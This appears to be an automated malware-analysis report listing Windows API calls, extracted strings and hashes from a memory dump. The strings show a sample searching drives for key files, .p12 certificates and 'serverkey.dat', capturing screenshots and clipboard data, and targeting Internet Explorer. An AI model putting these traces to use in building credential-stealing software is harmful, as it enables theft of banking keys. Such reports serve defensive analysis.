                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD37D
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02BBD392
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD3A1
                                                                                                                                                                                                            • SetWindowTextA.USER32(?,-00000008), ref: 02BBD3AD
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD3BC
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD3C7
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD3DA
                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 02BBD418
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD428
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD437
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 02BBD44F
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 02BBD459
                                                                                                                                                                                                            • CreateFontIndirectA.GDI32 ref: 02BBD46F
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 02BBD47F
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBD4B7
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBD4BA
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02BBD4CE
                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02BBD533
                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 02BBD55D
                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 02BBD569
                                                                                                                                                                                                            • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 02BBD585
                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 02BBD5AA
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F4,?), ref: 02BBD5BC
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02BBD5C5
                                                                                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02BBD5D4
                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(00000000), ref: 02BBD5DB
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 02BBD5EF
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 02BBD613
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 02BBD620
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 02BBD630
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000DE), ref: 02BBD64C
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000F2), ref: 02BBD655
                                                                                                                                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 02BBD661
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 02BBD67B
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBD6A4
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBD6B3
                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 02BBD6C6
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBD6E9
                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 02BBD707
                                                                                                                                                                                                            • ShowWindow.USER32(?,00000001), ref: 02BBD714
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD723
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD73B
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBD2BC
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: GetCurrentThreadId.KERNEL32 ref: 02BBD2C4
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02BBD2D0
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 02BBD2E1
                                                                                                                                                                                                              • Part of subcall function 02BBD2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02BBD2ED
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBD748
                                                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 02BBD7B7
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000), ref: 02BBD7BE
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBD7CE
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD7E8
                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000000), ref: 02BBD7FD
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EB), ref: 02BBD80C
                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 02BBD818
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BBD827
                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 02BBD82E
                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 02BBD843
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                            • String ID: '$<$static
                                                                                                                                                                                                            • API String ID: 2592195760-1233416523
                                                                                                                                                                                                            • Opcode ID: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                            • Instruction ID: bbe77d3bf8c27a51baf993195a4ebad47598fbc2af0b58c3bc250a8c02e394a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a6e5a56f8d4b7326b130102c1beb45bd905bc4a5640e49351fc8f5186006787
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53E1C471984301AFD7A18F68EC88F7A37A8EF887A2F540A08F755E72C5C7B49451CB61
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB3ACA
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02BB3B33
                                                                                                                                                                                                            • SymSetOptions.DBGHELP(00000006), ref: 02BB3B48
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02BB3B58
                                                                                                                                                                                                            • SymInitialize.DBGHELP(00000000), ref: 02BB3B5B
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3B9A
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02BB3C27
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3C47
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BB3CD4
                                                                                                                                                                                                            • ZwQueryInformationThread.NTDLL(00000000), ref: 02BB3CDB
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3D20
                                                                                                                                                                                                              • Part of subcall function 02BD5460: VirtualQuery.KERNEL32(02BD5460,?,0000001C), ref: 02BD5488
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • sysinfo.log, xrefs: 02BB3F78
                                                                                                                                                                                                            • DEBUG, xrefs: 02BB404D
                                                                                                                                                                                                            • HH;mm;ss, xrefs: 02BB3EB2
                                                                                                                                                                                                            • ThreadStart = , xrefs: 02BB3CF8
                                                                                                                                                                                                            • CallStack:, xrefs: 02BB3D58
                                                                                                                                                                                                            • debug_%s_%s.log, xrefs: 02BB3ED4
                                                                                                                                                                                                            • scr.bmp, xrefs: 02BB3FF8
                                                                                                                                                                                                            • main, xrefs: 02BB3BEE
                                                                                                                                                                                                            • dd;MMM;yyyy, xrefs: 02BB3E8B
                                                                                                                                                                                                            • ExceptionAddress = , xrefs: 02BB3B68
                                                                                                                                                                                                            • csm, xrefs: 02BB3A45
                                                                                                                                                                                                            • Self exception = TRUE, xrefs: 02BB3C8D
                                                                                                                                                                                                            • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02BB3C3E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                            • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                            • API String ID: 2913300210-1369666974
                                                                                                                                                                                                            • Opcode ID: 8bb82fe8fc594765472ac2c65ca803e0bac1a53933efa8a23bbab986de210314
                                                                                                                                                                                                            • Instruction ID: 0839a6c44019a311880b14a3d3d9dfb0d7b2d70f0c7ef853d7c2cae4017eefb5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb82fe8fc594765472ac2c65ca803e0bac1a53933efa8a23bbab986de210314
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D712E371A006059FDB25CF68C894BEABBF2FF49304F5485D8E949DB351DBB1A948CB80
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2BCE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD2BE8
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02BD2C12
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD2C37
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD2C77
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2C81
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2C89
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BD2C9A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2CA1
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 02BD2CE4
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02BD2D30
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90,00000000,00000000), ref: 02BD2D77
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                            • API String ID: 1576442920-3133255229
                                                                                                                                                                                                            • Opcode ID: 3c7bf2ff980502d3c51b6da101097ae04c48434f1774128b32ba6c8cc6f1ec00
                                                                                                                                                                                                            • Instruction ID: dd60c5284d994a9b00b817e2fc5497e8ff43cbc09e91c6cebe123f8da4634dab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c7bf2ff980502d3c51b6da101097ae04c48434f1774128b32ba6c8cc6f1ec00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0D146309043899FDB258F38D858BEA7BE5EF45340F1485D5EDCAD7242EB70A989CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCD13F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCD161
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCD176
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02BCD18F
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02BCD1D8
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCD1EB
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02BCD24D
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 989413159-3811065237
                                                                                                                                                                                                            • Opcode ID: 4b48285cd9c4422f3bfbad929bb5bbc68bc0c97e0891ea7384beb4516587c444
                                                                                                                                                                                                            • Instruction ID: 4ebb18f6d309bdc365a86fec23209c540f04de813bfb231f3beaabccba1aa67c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b48285cd9c4422f3bfbad929bb5bbc68bc0c97e0891ea7384beb4516587c444
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9C1B3755083468FC725CB389468BABBBE5EF89344F548AADF9CAC7241EB30D508C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE6CF
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE6F1
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02BCE706
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02BCE71F
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02BCE768
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCE77B
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 02BCE7DD
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02BCEAF3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                            • String ID: *.00*$.txt$.zip$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 989413159-3811065237
                                                                                                                                                                                                            • Opcode ID: 0d6a7a2af613a2ab442d4d07eb05d8c43a5cfe4466e229e2c737dc88661f9924
                                                                                                                                                                                                            • Instruction ID: e6614c0942615e29c6bc555cf29b76eadb5485b1bad62e2b181ee209f2174c54
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d6a7a2af613a2ab442d4d07eb05d8c43a5cfe4466e229e2c737dc88661f9924
                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADC1B1715083418FC725CB389468BABBBE5EF89344F548A9DFADAD7240EB70D508C791
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB118E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F570), ref: 02BB11AD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02BB11C5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02BB11DB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 02BB11FF
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1221
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB123E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB1245
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB1255
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1271
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB4B0,00000000,00000000,00000000), ref: 02BB1285
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 02BB12A4
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB12D5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02BB12F2
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB12F9
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB1309
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02BB1325
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCEB30,00000000,00000000,00000000), ref: 02BB1339
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD01A0,00000000,00000000,00000000), ref: 02BB1376
                                                                                                                                                                                                              • Part of subcall function 02BCB410: PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB437
                                                                                                                                                                                                              • Part of subcall function 02BCB410: PathFileExistsA.SHLWAPI(?), ref: 02BCB4A0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB138E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB139F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                            • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                            • API String ID: 183229269-3502489836
                                                                                                                                                                                                            • Opcode ID: c4a7e17ea5716c17d40686e854fb6bf806076e0c096d696fd51eab1ed78e284e
                                                                                                                                                                                                            • Instruction ID: 2e213882ea089ec172d2ea8bf06a91bf0813880c3e27ef5a32485e6743e29624
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4a7e17ea5716c17d40686e854fb6bf806076e0c096d696fd51eab1ed78e284e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D731D963257AFB725A288C59FFB3E2CDF01B94F544294BA08A61C0EBA09544CAB4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                            • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                            • API String ID: 2246752426-2295261572
                                                                                                                                                                                                            • Opcode ID: 407f9d55b5bbad0a4a5eac57780f23bb89076c113e89ca00dca12ead1e02e834
                                                                                                                                                                                                            • Instruction ID: d08d8d2f7da387c731888194a9b3b5105c60de4fc3fd2da1127c0567850c4d55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 407f9d55b5bbad0a4a5eac57780f23bb89076c113e89ca00dca12ead1e02e834
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4A14873A4021A9FDB21CB24CC54FEA7775EF85304F1486D4EB899B180E771AA49CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC323D
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02BC325E
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC327F
                                                                                                                                                                                                            • GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
                                                                                                                                                                                                            • GetOpenClipboardWindow.USER32 ref: 02BC329C
                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 02BC32AA
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC3301
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3311
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC337E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC338E
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02BC33DF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                            • API String ID: 3472172748-4108050209
                                                                                                                                                                                                            • Opcode ID: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                            • Instruction ID: 2e0d8ccb9017695ace6d1db410fb8df522b4afeb8221c5ebe70c673978bece36
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce771464a92efe3e0ea6eb021d9978e93016318daa225127e5b72e7337e90ee6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF513431604302ABD7209B689C4CF6B7BE8EFC6754FA0879CFA8597280DF20D90487A5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 02BC190E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000), ref: 02BC1915
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC1990
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC1999
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,76F8F550,76F91620,80000002), ref: 02BC19E3
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC19E6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC19F3
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC19F6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1A06
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1A20
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC1A4F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC1A52
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC1A5F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC1A62
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                            • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                            • API String ID: 2523706361-3242205626
                                                                                                                                                                                                            • Opcode ID: 2bb3e551e8eb6d3c67a0594aa99c7435c9f809efce73334fd34811feaa2bfc65
                                                                                                                                                                                                            • Instruction ID: be5c7065b6ad81ca9fb1ccb574a9040ef16f186e05aea69209aa9d369d72a923
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bb3e551e8eb6d3c67a0594aa99c7435c9f809efce73334fd34811feaa2bfc65
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4311432E9131027E77126785C09F6B3A48DF40B85F6544ACFF8AF7242EBA4C8158BE1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02BD9991
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 02BD9B0D
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 02BD9B1C
